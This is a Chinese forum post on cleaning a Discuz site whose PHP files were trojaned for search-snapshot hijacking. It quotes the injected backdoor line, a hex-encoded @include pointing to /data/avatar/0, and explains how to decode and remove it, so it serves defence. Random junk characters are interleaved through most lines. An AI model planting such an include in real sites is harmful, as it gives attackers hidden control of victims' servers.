关于被挂马,劫持快照问题:% U" E+ M0 j3 S$ l) b* l: x
0 r2 u1 F) [9 ~0 c$ Z4 U
用以下方法试试+ Q/ R8 Y/ e* z; ?* d1 A( B
# r2 Z* S: ?% ^
若存在,处理前,先卸载所有盗版插件与模版。
& \7 @" Y9 g. z, [1 k% ^
6 U, j! P4 k% ?" _进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。
; p; S; h5 n; w- Y* l& p& X
8 O2 {/ F6 f1 N. N; \: X1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。
I; |' ~" C- f0 w$ I' N \9 W L$ l8 h/ X+ A: G4 Z! j* Q2 N
2、排查网站源文件的php 文件,查看是否有如下代码:@include($_SERVER['DOCUMENT_ROOT']
- w; K& r+ }& x1 ]8 {1 V5 Y* B
6 Y0 s( |. x, {$ } H5 U(排查一般用WEBshell后门扫描软件扫描核查!)
. n5 E6 F. U' f) |8 k
! g: l! ?* W' Z( _6 V" r: e如果有就删除此段代码。并把该段代码进行解密。
7 y) a, ]2 _; P0 f# O9 w( g, l! u, [. O- q
举例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
5 j- d# ?, ~6 }0 q8 d: G- x, o* _& J: L2 k0 R. i2 f
需要解密的代码为:2F646174612F6176617461722F30
6 x( g9 H5 L% W0 |$ o7 I& X
( [' s4 \7 m( M4 B. P5 O解密后为:/data/avatar/0. c3 Y! g0 o+ c
2 l1 q% t% D- C; s; ]1 g代码解密地址:http://www.bejson.com/convert/ox2str/
~/ l. R/ c! f
* Y0 G' W4 u) Z+ f, \
- W+ b, \* J. m/ U5 N D: X9 T+ g( d意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。
( Z# \- }6 l2 f$ E% i+ D! Y; L4 I4 y
解决办法:删除上面的代码和文件即可。
) e0 F9 d% B- S( z* t v" _ j8 A. K) [, d$ j- R1 G
挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。 |
显身卡